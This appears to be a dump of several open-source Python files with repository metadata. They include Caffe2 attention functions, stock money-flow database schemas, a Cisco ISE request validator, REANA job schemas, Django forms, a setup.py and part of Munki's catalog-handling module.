)
return attention_logits_transposed
# \textbf{W}^\alpha used in the context of \alpha_{sum}(a,b)
def _apply_fc_weight_for_sum_match(
model,
input,
dim_in,
dim_out,
scope,
name,
):
output = model.FC(
input,
s(scope, name),
dim_in=dim_in,
dim_out=dim_out,
axis=2,
)
output = model.net.Squeeze(
output,
output,
dims=[0],
)
return output
# Implement RecAtt due to section 4.1 in http://arxiv.org/abs/1601.03317
def apply_recurrent_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
attention_weighted_encoder_context_t_prev,
scope,
):
weighted_prev_attention_context = _apply_fc_weight_for_sum_match(
model=model,
input=attention_weighted_encoder_context_t_prev,
dim_in=encoder_output_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_prev_attention_context',
)
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state',
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum_tmp = model.net.Add(
[
weighted_encoder_outputs,
weighted_decoder_hidden_state,
],
s(scope, 'decoder_hidden_encoder_outputs_sum_tmp'),
broadcast=1,
use_grad_hack=1,
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[
decoder_hidden_encoder_outputs_sum_tmp,
weighted_prev_attention_context,
],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope,
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope,
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope,
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum_tmp,
decoder_hidden_encoder_outputs_sum,
]
def apply_regular_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
scope,
):
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state',
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[weighted_encoder_outputs, weighted_decoder_hidden_state],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope,
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope,
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope,
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum,
]
| 28.926199 | 78 | 0.694221 | [
"MIT"
] | Excalibur0214/Hello-world | caffe2/python/attention.py | 7,839 | Python |
# -*- coding: utf-8 -*-
from sqlalchemy import Column, String, Float
from sqlalchemy.ext.declarative import declarative_base
from zvt.contract import Mixin
from zvt.contract.register import register_schema
MoneyFlowBase = declarative_base()
# 板块资金流向
class BlockMoneyFlow(MoneyFlowBase, Mixin):
__tablename__ = 'block_money_flow'
code = Column(String(length=32))
name = Column(String(length=32))
# 收盘价
close = Column(Float)
change_pct = Column(Float)
turnover_rate = Column(Float)
# 净流入
net_inflows = Column(Float)
# 净流入率
net_inflow_rate = Column(Float)
# 主力=超大单+大单
net_main_inflows = Column(Float)
net_main_inflow_rate = Column(Float)
# 超大单
net_huge_inflows = Column(Float)
net_huge_inflow_rate = Column(Float)
# 大单
net_big_inflows = Column(Float)
net_big_inflow_rate = Column(Float)
# 中单
net_medium_inflows = Column(Float)
net_medium_inflow_rate = Column(Float)
# 小单
net_small_inflows = Column(Float)
net_small_inflow_rate = Column(Float)
class StockMoneyFlow(MoneyFlowBase, Mixin):
__tablename__ = 'stock_money_flow'
code = Column(String(length=32))
name = Column(String(length=32))
# 收盘价
close = Column(Float)
change_pct = Column(Float)
turnover_rate = Column(Float)
# 净流入
net_inflows = Column(Float)
# 净流入率
net_inflow_rate = Column(Float)
# 主力=超大单+大单
net_main_inflows = Column(Float)
net_main_inflow_rate = Column(Float)
# 超大单
net_huge_inflows = Column(Float)
net_huge_inflow_rate = Column(Float)
# 大单
net_big_inflows = Column(Float)
net_big_inflow_rate = Column(Float)
# 中单
net_medium_inflows = Column(Float)
net_medium_inflow_rate = Column(Float)
# 小单
net_small_inflows = Column(Float)
net_small_inflow_rate = Column(Float)
register_schema(providers=['sina'], db_name='money_flow', schema_base=MoneyFlowBase)
# the __all__ is generated
__all__ = ['BlockMoneyFlow', 'StockMoneyFlow'] | 24 | 84 | 0.700893 | [
"MIT"
] | Bruce-Dudu/zvt | zvt/domain/misc/money_flow.py | 2,132 | Python |
# -*- coding: utf-8 -*-
"""Identity Services Engine getAllowedProtocolById data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from ciscoisesdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorE3DdfDdd45E299F14Ed194926F8De(object):
"""getAllowedProtocolById request schema definition."""
def __init__(self):
super(JSONSchemaValidatorE3DdfDdd45E299F14Ed194926F8De, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"AllowedProtocols": {
"properties": {
"allowChap": {
"type": "boolean"
},
"allowEapFast": {
"type": "boolean"
},
"allowEapMd5": {
"type": "boolean"
},
"allowEapTls": {
"type": "boolean"
},
"allowEapTtls": {
"type": "boolean"
},
"allowLeap": {
"type": "boolean"
},
"allowMsChapV1": {
"type": "boolean"
},
"allowMsChapV2": {
"type": "boolean"
},
"allowPapAscii": {
"type": "boolean"
},
"allowPeap": {
"type": "boolean"
},
"allowPreferredEapProtocol": {
"type": "boolean"
},
"allowTeap": {
"type": "boolean"
},
"allowWeakCiphersForEap": {
"type": "boolean"
},
"description":
{
"type": "string"
},
"eapFast": {
"properties": {
"allowEapFastEapGtc": {
"type": "boolean"
},
"allowEapFastEapGtcPwdChange": {
"type": "boolean"
},
"allowEapFastEapGtcPwdChangeRetries": {
"type": "integer"
},
"allowEapFastEapMsChapV2": {
"type": "boolean"
},
"allowEapFastEapMsChapV2PwdChange": {
"type": "boolean"
},
"allowEapFastEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"allowEapFastEapTls": {
"type": "boolean"
},
"allowEapFastEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"eapFastEnableEAPChaining": {
"type": "boolean"
},
"eapFastUsePacs": {
"type": "boolean"
},
"eapFastUsePacsAllowAnonymProvisioning": {
"type": "boolean"
},
"eapFastUsePacsAllowAuthenProvisioning": {
"type": "boolean"
},
"eapFastUsePacsAllowMachineAuthentication": {
"type": "boolean"
},
"eapFastUsePacsStatelessSessionResume": {
"type": "boolean"
},
"eapFastUsePacsTunnelPacTtl": {
"type": "integer"
},
"eapFastUsePacsTunnelPacTtlUnits": {
"type": "string"
},
"eapFastUsePacsUseProactivePacUpdatePrecentage": {
"type": "integer"
}
},
"type": "object"
},
"eapTls": {
"properties": {
"allowEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"eapTlsEnableStatelessSessionResume": {
"type": "boolean"
}
},
"type": "object"
},
"eapTlsLBit": {
"type": "boolean"
},
"eapTtls": {
"properties": {
"eapTtlsChap": {
"type": "boolean"
},
"eapTtlsEapMd5": {
"type": "boolean"
},
"eapTtlsEapMsChapV2": {
"type": "boolean"
},
"eapTtlsEapMsChapV2PwdChange": {
"type": "boolean"
},
"eapTtlsEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"eapTtlsMsChapV1": {
"type": "boolean"
},
"eapTtlsMsChapV2": {
"type": "boolean"
},
"eapTtlsPapAscii": {
"type": "boolean"
}
},
"type": "object"
},
"name": {
"type": "string"
},
"peap": {
"properties": {
"allowPeapEapGtc": {
"type": "boolean"
},
"allowPeapEapMsChapV2": {
"type": "boolean"
},
"allowPeapEapMsChapV2PwdChange": {
"type": "boolean"
},
"allowPeapEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"allowPeapEapTls": {
"type": "boolean"
},
"allowPeapEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"allowPeapV0": {
"type": "boolean"
},
"requireCryptobinding": {
"type": "boolean"
}
},
"type": "object"
},
"preferredEapProtocol": {
"type": "string"
},
"processHostLookup": {
"type": "boolean"
},
"requireMessageAuth": {
"type": "boolean"
},
"teap": {
"properties": {
"acceptClientCertDuringTunnelEst": {
"type": "boolean"
},
"allowTeapEapMsChapV2": {
"type": "boolean"
},
"allowTeapEapMsChapV2PwdChange": {
"type": "boolean"
},
"allowTeapEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"allowTeapEapTls": {
"type": "boolean"
},
"allowTeapEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"enableEapChaining": {
"type": "boolean"
},
"requestBasicPwdAuth": {
"type": "boolean"
}
},
"type": "object"
}
},
"type": "object"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| 32.425993 | 80 | 0.416388 | [
"MIT"
] | oianson/ciscoisesdk | tests/models/validators/v3_0_0/jsd_e3ddfddd45e299f14ed194926f8de.py | 8,982 | Python |
#! /usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2019/3/10 7:44 PM
# @Author : xiaoliji
# @Email : [email protected]
"""
找出和为s的数字。
>>> nums = [1, 2, 4, 7, 11, 15]
>>> FindNumbersWithSum(nums, 15)
(4, 11)
"""
def FindNumbersWithSum(array: list, tsum: int) -> tuple:
l, r = 0, len(array)-1
while l < r:
if array[l] + array[r] < tsum:
l += 1
elif array[l]+array[r] > tsum:
r -= 1
else:
return array[l], array[r]
return [] | 21.916667 | 56 | 0.48289 | [
"Apache-2.0"
] | ck76/awesome-cs | Algorithm/coding_interviews/Python/sword-for-offer/57_find_num_with_sum.py | 542 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018, 2019, 2020, 2021, 2022 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA Job Controller models."""
from marshmallow import Schema, fields, ValidationError, pre_load
from reana_commons.job_utils import deserialise_job_command
from reana_job_controller.config import (
REANA_KUBERNETES_JOBS_TIMEOUT_LIMIT,
REANA_KUBERNETES_JOBS_MAX_USER_TIMEOUT_LIMIT,
)
class Job(Schema):
"""Job model."""
cmd = fields.Str(required=True)
docker_img = fields.Str(required=True)
job_id = fields.Str(required=True)
max_restart_count = fields.Int(required=True)
restart_count = fields.Int(required=True)
status = fields.Str(required=True)
cvmfs_mounts = fields.String(missing="")
class JobRequest(Schema):
"""Job request model."""
job_name = fields.Str(required=True)
workflow_workspace = fields.Str(required=True)
workflow_uuid = fields.Str(required=True)
cmd = fields.Function(missing="", deserialize=deserialise_job_command)
prettified_cmd = fields.Str(missing="")
docker_img = fields.Str(required=True)
cvmfs_mounts = fields.String(missing="")
env_vars = fields.Dict(missing={})
shared_file_system = fields.Bool(missing=True)
compute_backend = fields.Str(required=False)
kerberos = fields.Bool(required=False)
voms_proxy = fields.Bool(required=False)
kubernetes_uid = fields.Int(required=False)
kubernetes_memory_limit = fields.Str(required=False)
kubernetes_job_timeout = fields.Int(required=False)
unpacked_img = fields.Bool(required=False)
htcondor_max_runtime = fields.Str(required=False)
htcondor_accounting_group = fields.Str(required=False)
slurm_partition = fields.Str(required=False)
slurm_time = fields.Str(required=False)
@pre_load
def set_kubernetes_job_timeout(self, in_data, **kwargs):
"""Set kubernetes_job_timeout to a default value if not provided and validate the value.
Method receives the whole data dictionary but operates *only* on kubernetes_job_timeout.
Updated dictionary is returned.
"""
if "kubernetes_job_timeout" not in in_data:
try:
in_data["kubernetes_job_timeout"] = int(
REANA_KUBERNETES_JOBS_TIMEOUT_LIMIT
)
except (ValueError, TypeError):
raise ValidationError(
"Default value of kubernetes_job_timeout is not an integer. "
f"Provided value is '{REANA_KUBERNETES_JOBS_TIMEOUT_LIMIT}'. "
"Please contact the administrator."
)
job_timeout = in_data["kubernetes_job_timeout"]
try:
job_timeout = int(job_timeout)
except (ValueError, TypeError):
raise ValidationError(
f"kubernetes_job_timeout must be an integer. Provided value is '{job_timeout}'."
)
if job_timeout <= 0:
raise ValidationError(
"kubernetes_job_timeout must be greater than 0."
f"Provided value is {job_timeout}."
)
try:
max_value = int(REANA_KUBERNETES_JOBS_MAX_USER_TIMEOUT_LIMIT)
except (ValueError, TypeError):
raise ValidationError(
"Max value for kubernetes_job_timeout is not an integer. "
f"Provided value is '{REANA_KUBERNETES_JOBS_MAX_USER_TIMEOUT_LIMIT}'. "
"Please contact the administrator."
)
if job_timeout > max_value:
raise ValidationError(
f"kubernetes_job_timeout exceeds maximum allowed value of {max_value} seconds. "
f"Provided value is {job_timeout} seconds."
)
in_data["kubernetes_job_timeout"] = job_timeout
return in_data
| 37.203704 | 96 | 0.664759 | [
"MIT"
] | focilo/focilo-job-controller | reana_job_controller/schemas.py | 4,018 | Python |
from django import forms
from models import *
class QuestionForm(forms.ModelForm):
def __init__(self, user = None, *args, **kwargs):
self.user = user
super(QuestionForm, self).__init__(*args, **kwargs)
def save(self):
question = Question(user = self.user, category = self.cleaned_data['category'], title =self.cleaned_data['title'], description = self.cleaned_data['description'])
question.save()
return question
class Meta:
model = Question
exclude = ('user', 'is_open')
class CategoryForm(forms.ModelForm):
class Meta:
model = Category
exclude = ('slug')
class AnswerForm(forms.Form):
def __init__(self, user = None, question = None, *args, **kwargs):
super(AnswerForm, self).__init__(*args, **kwargs)
self.user = user
self.question = question
def save(self):
answer = Answer(text = self.cleaned_data['answer'])
answer.user = self.user
answer.question = self.question
answer.save()
return answer
answer = forms.CharField(widget = forms.Textarea)
class ProfileImageForm(forms.ModelForm):
class Meta:
model = UserProfile
exclude = ('best_answers', 'answers', 'points', 'user')
| 31.136364 | 171 | 0.587591 | [
"BSD-3-Clause"
] | agiliq/django-answrs | answrs/aforms.py | 1,370 | Python |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "vote_project.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 35.217391 | 77 | 0.644444 | [
"MIT"
] | dasap89/django_test_tutorial | vote_project/manage.py | 810 | Python |
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
# https://stackoverflow.com/questions/458550/standard-way-to-embed-version-into-python-package/16084844#16084844
exec(open('pretrainedmodels/version.py').read())
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name='pretrainedmodels', # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=__version__, # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='Pretrained models for Pytorch', # Required
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
long_description=long_description, # Optional
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url='https://github.com/cadene/pretrained-models.pytorch', # Optional
# This should be your name or the name of the organization which owns the
# project.
author='Remi Cadene', # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='[email protected]', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.6',
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='pytorch pretrained models deep learning', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(exclude=['data', 'examples']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['torch', 'torchvision', 'munch', 'tqdm'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# If using Python 2.6 or earlier, then these have to be included in
# MANIFEST.in as well.
# package_data={ # Optional
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
# entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
| 39.626506 | 112 | 0.686683 | [
"BSD-3-Clause"
] | AkatsukiCC/pretrained-models.pytorch | setup.py | 6,578 | Python |
# encoding: utf-8
#
# Copyright 2009-2020 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
updatecheck.catalogs
Created by Greg Neagle on 2017-01-01.
Functions for working with Munki catalogs
"""
from __future__ import absolute_import, print_function
import os
from . import download
from .. import display
from .. import info
from .. import pkgutils
from .. import prefs
from .. import utils
from .. import FoundationPlist
from ..wrappers import is_a_string
def make_catalog_db(catalogitems):
"""Takes an array of catalog items and builds some indexes so we can
get our common data faster. Returns a dict we can use like a database"""
name_table = {}
pkgid_table = {}
itemindex = -1
for item in catalogitems:
itemindex = itemindex + 1
name = item.get('name', 'NO NAME')
vers = item.get('version', 'NO VERSION')
if name == 'NO NAME' or vers == 'NO VERSION':
display.display_warning('Bad pkginfo: %s', item)
# normalize the version number
vers = pkgutils.trim_version_string(vers)
# build indexes for items by name and version
if not name in name_table:
name_table[name] = {}
if not vers in name_table[name]:
name_table[name][vers] = []
name_table[name][vers].append(itemindex)
# build table of receipts
for receipt in item.get('receipts', []):
if 'packageid' in receipt and 'version' in receipt:
pkg_id = receipt['packageid']
version = receipt['version']
if not pkg_id in pkgid_table:
pkgid_table[pkg_id] = {}
if not version in pkgid_table[pkg_id]:
pkgid_table[pkg_id][version] = []
pkgid_table[pkg_id][version].append(itemindex)
# build table of update items with a list comprehension --
# filter all items from the catalogitems that have a non-empty
# 'update_for' list
updaters = [item for item in catalogitems if item.get('update_for')]
# now fix possible admin errors where 'update_for' is a string instead
# of a list of strings
for update in updaters:
if is_a_string(update['update_for']):
# convert to list of strings
update['update_for'] = [update['update_for']]
# build table of autoremove items with a list comprehension --
# filter all items from the catalogitems that have a non-empty
# 'autoremove' list
# autoremove items are automatically removed if they are not in the
# managed_install list (either directly or indirectly via included
# manifests)
autoremoveitems = [item.get('name') for item in catalogitems
if item.get('autoremove')]
# convert to set and back to list to get list of unique names
autoremoveitems = list(set(autoremoveitems))
pkgdb = {}
pkgdb['named'] = name_table
pkgdb['receipts'] = pkgid_table
pkgdb['updaters'] = updaters
pkgdb['autoremoveitems'] = autoremoveitems
pkgdb['items'] = catalogitems
return pkgdb
def add_package_ids(catalogitems, itemname_to_pkgid, pkgid_to_itemname):
"""Adds packageids from each catalogitem to two dictionaries.
One maps itemnames to receipt pkgids, the other maps receipt pkgids
to itemnames"""
for item in catalogitems:
name = item.get('name')
if not name:
continue
if item.get('receipts'):
if not name in itemname_to_pkgid:
itemname_to_pkgid[name] = {}
for receipt in item['receipts']:
if 'packageid' in receipt and 'version' in receipt:
pkgid = receipt['packageid']
vers = receipt['version']
if not pkgid in itemname_to_pkgid[name]:
itemname_to_pkgid[name][pkgid] = []
if not vers in itemname_to_pkgid[name][pkgid]:
itemname_to_pkgid[name][pkgid].append(vers)
if not pkgid in pkgid_to_itemname:
pkgid_to_itemname[pkgid] = {}
if not name in pkgid_to_itemname[pkgid]:
pkgid_to_itemname[pkgid][name] = []
if not vers in pkgid_to_itemname[pkgid][name]:
pkgid_to_itemname[pkgid][name].append(vers)
def split_name_and_version(some_string):
"""Splits a string into the name and version number.
Name and version must be separated with a hyphen ('-')
or double hyphen ('--').
'TextWrangler-2.3b1' becomes ('TextWrangler', '2.3b1')
'AdobePhotoshopCS3--11.2.1' becomes ('AdobePhotoshopCS3', '11.2.1')
'MicrosoftOffice2008-12.2.1' becomes ('MicrosoftOffice2008', '12.2.1')
"""
for delim in ('--', '-'):
if some_string.count(delim) > 0:
chunks = some_string.split(delim)
vers = chunks.pop()
name = delim.join(chunks)
if vers[0] in '0123456789':
return (name, vers)
return (some_string, '')
def get_all_items_with_name(name, cataloglist):
"""Searches the catalogs in a list for all items matching a given name.
Returns:
list of pkginfo items; sorted with newest version first. No precedence
is given to catalog order.
"""
def item_version(item):
"""Returns a MunkiLooseVersion for pkginfo item"""
return pkgutils.MunkiLooseVersion(item['version'])
itemlist = []
# we'll throw away any included version info
name = split_name_and_version(name)[0]
display.display_debug1('Looking for all items matching: %s...', name)
for catalogname in cataloglist:
if not catalogname in list(_CATALOG.keys()):
# in case catalogname refers to a non-existent catalog...
continue
# is name in the catalog name table?
if name in _CATALOG[catalogname]['named']:
versionsmatchingname = _CATALOG[catalogname]['named'][name]
for vers in versionsmatchingname:
if vers == 'latest':
continue
indexlist = _CATALOG[catalogname]['named'][name][vers]
for index in indexlist:
thisitem = _CATALOG[catalogname]['items'][index]
if not thisitem in itemlist:
display.display_debug1(
'Adding item %s, version %s from catalog %s...',
name, thisitem['version'], catalogname)
itemlist.append(thisitem)
if itemlist:
# sort so latest version is first
itemlist.sort(key=item_version, reverse=True)
return itemlist
def get_auto_removal_items(installinfo, cataloglist):
"""Gets a list of items marked for automatic removal from the catalogs
in cataloglist. Filters those against items in the processed_installs
list, which should contain everything that is supposed to be installed.
Then filters against the removals list, which contains all the removals
that have already been processed.
"""
autoremovalnames = []
for catalogname in cataloglist or []:
if catalogname in list(_CATALOG.keys()):
autoremovalnames += _CATALOG[catalogname]['autoremoveitems']
processed_installs_names = [split_name_and_version(item)[0]
for item in installinfo['processed_installs']]
autoremovalnames = [item for item in autoremovalnames
if item not in processed_installs_names
and item not in installinfo['processed_uninstalls']]
return autoremovalnames
def look_for_updates(itemname, cataloglist):
"""Looks for updates for a given manifest item that is either
installed or scheduled to be installed or removed. This handles not only
specific application updates, but also updates that aren't simply
later versions of the manifest item.
For example, AdobeCameraRaw is an update for Adobe Photoshop, but
doesn't update the version of Adobe Photoshop.
Returns a list of manifestitem names that are updates for
manifestitem.
"""
display.display_debug1('Looking for updates for: %s', itemname)
# get a list of catalog items that are updates for other items
update_list = []
for catalogname in cataloglist:
if catalogname not in _CATALOG:
# in case the list refers to a non-existent catalog
continue
updaters = _CATALOG[catalogname]['updaters']
# list comprehension coming up...
update_items = [catalogitem['name']
for catalogitem in updaters
if itemname in catalogitem.get('update_for', [])]
if update_items:
update_list.extend(update_items)
# make sure the list has only unique items:
update_list = list(set(update_list))
if update_list:
# updates were found, so let's display them
num_updates = len(update_list)
# format the update list for better on-screen viewing
update_list_display = ", ".join(str(x) for x in update_list)
display.display_debug1(
'Found %s update(s): %s', num_updates, update_list_display)
return update_list
def look_for_updates_for_version(itemname, itemversion, cataloglist):
"""Looks for updates for a specific version of an item. Since these
can appear in manifests and pkginfo as item-version or item--version
we have to search twice."""
name_and_version = '%s-%s' % (itemname, itemversion)
alt_name_and_version = '%s--%s' % (itemname, itemversion)
update_list = look_for_updates(name_and_version, cataloglist)
update_list.extend(look_for_updates(alt_name_and_version, cataloglist))
# make sure the list has only unique items:
update_list = list(set(update_list))
return update_list
def best_version_match(vers_num, item_dict):
'''Attempts to find the best match in item_dict for vers_num'''
vers_tuple = vers_num.split('.')
precision = 1
while precision <= len(vers_tuple):
test_vers = '.'.join(vers_tuple[0:precision])
match_names = []
for item in item_dict.keys():
for item_version in item_dict[item]:
if (item_version.startswith(test_vers) and
item not in match_names):
match_names.append(item)
if len(match_names) == 1:
return match_names[0]
precision = precision + 1
return None
@utils.Memoize
def analyze_installed_pkgs():
"""Analyze catalog data and installed packages in an attempt to determine
what is installed."""
pkgdata = {}
itemname_to_pkgid = {}
pkgid_to_itemname = {}
for catalogname in _CATALOG:
catalogitems = _CATALOG[catalogname]['items']
add_package_ids(catalogitems, itemname_to_pkgid, pkgid_to_itemname)
# itemname_to_pkgid now contains all receipts (pkgids) we know about
# from items in all available catalogs
installedpkgs = pkgutils.getInstalledPackages()
installed = []
partiallyinstalled = []
installedpkgsmatchedtoname = {}
for name in itemname_to_pkgid:
# name is a Munki install item name
foundpkgcount = 0
for pkgid in itemname_to_pkgid[name]:
if pkgid in installedpkgs:
foundpkgcount += 1
if not name in installedpkgsmatchedtoname:
installedpkgsmatchedtoname[name] = []
# record this pkgid for Munki install item name
installedpkgsmatchedtoname[name].append(pkgid)
if foundpkgcount > 0:
if foundpkgcount == len(itemname_to_pkgid[name]):
# we found all receipts by pkgid on disk
installed.append(name)
else:
# we found only some receipts for the item
# on disk
partiallyinstalled.append(name)
# we pay special attention to the items that seem partially installed.
# we need to see if there are any packages that are unique to this item
# if there aren't, then this item probably isn't installed, and we're
# just finding receipts that are shared with other items.
for name in partiallyinstalled:
# get a list of pkgs for this item that are installed
pkgsforthisname = installedpkgsmatchedtoname[name]
# now build a list of all the pkgs referred to by all the other
